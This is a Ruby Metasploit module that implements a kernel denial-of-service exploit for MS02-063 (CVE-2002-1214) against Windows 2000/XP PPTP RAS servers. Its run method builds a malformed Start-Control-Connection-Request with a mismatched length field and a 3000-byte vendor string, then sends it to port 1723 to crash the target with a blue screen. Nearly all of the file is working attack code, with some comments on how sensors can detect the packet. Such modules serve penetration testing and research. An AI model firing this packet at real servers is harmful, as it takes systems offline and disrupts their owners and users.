##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Auxiliary denial-of-service module for MS02-063: sends a single malformed
# PPTP control message to a RAS server so that the vulnerable kernel driver
# crashes. Network I/O (connect / sock.put / disconnect) is provided by the
# Msf::Exploit::Remote::Tcp mixin; Msf::Auxiliary::Dos marks the module as
# destructive (see the CRASH_OS_DOWN stability note in the metadata).
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Dos

  # Registers module metadata and options.
  #
  # @param info [Hash] metadata merged via update_info (Metasploit convention)
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'MS02-063 PPTP Malformed Control Data Kernel Denial of Service',
        'Description' => %q{
          This module exploits a kernel based overflow when sending abnormal PPTP Control Data
          packets to Microsoft Windows 2000 SP0-3 and XP SP0-1 based PPTP RAS servers
          (Remote Access Services). Kernel memory is overwritten resulting in a BSOD.
          Code execution may be possible however this module is only a DoS.
        },
        'Author' => [ 'aushack' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'BID', '5807' ],
          [ 'CVE', '2002-1214' ],
          [ 'OSVDB', '13422' ],
          [ 'MSB', 'MS02-063' ],
        ],
        'DisclosureDate' => '2002-09-26',
        # The target is expected to go down hard (BSOD); no side effects are
        # listed and no reliability rating is given.
        'Notes' => {
          'Stability' => [CRASH_OS_DOWN],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )

    # PPTP control connections use TCP port 1723 by default.
    register_options(
      [
        Opt::RPORT(1723),
      ]
    )
  end

  # Connects to the target, writes the malformed Start-Control-Connection-Request
  # once, reports status, and disconnects.
  #
  # The declared PPTP length field (0x009c = 156) is far smaller than what is
  # actually written: 28 bytes of fixed fields followed by a 3000-byte vendor
  # string. That length/payload-size mismatch is the anomaly a network sensor
  # can key on. RFC 2637 gives the reference layout of this request (fixed-size
  # host-name and vendor-string fields) — confirm against it before re-deriving
  # field offsets from the inline comments.
  #
  # Success is not verified: the second status line is printed unconditionally
  # after the write, whether or not the target actually crashed.
  #
  # @return [void]
  def run
    connect

    # Fields borrowed from Wireshark :)
    # `sploit` is built up with <<, so the literal must stay unfrozen (adding a
    # frozen_string_literal magic comment to this file would raise FrozenError here).
    sploit = "\x00\x9c" # length
    sploit << "\x00\x01" # control message
    sploit << "\x1a\x2b\x3c\x4d" # cookie
    sploit << "\x00\x01" # start control connection req
    sploit << "\x00\x00" # reserved
    sploit << "\x01\x00" # protocol version
    sploit << "\x00\x00" # reserved
    sploit << "\x00\x03" # framing capabilities
    sploit << "\x00\x00\x00\x02" # bearer capabilities
    sploit << "\xff\xff" # max channels
    sploit << "\x0a\x28" # firmware revision
    sploit << "\x00\x01" # Hostname
    sploit << 'A' * 3000 # Vendor - trigger vuln

    print_status('Sending PPTP DoS Packet...')

    # Single write on the socket opened by connect; no response is read.
    sock.put(sploit)

    print_status('Packet sent. Kernel should halt on a Stop Error (BSOD).')

    disconnect
  end
end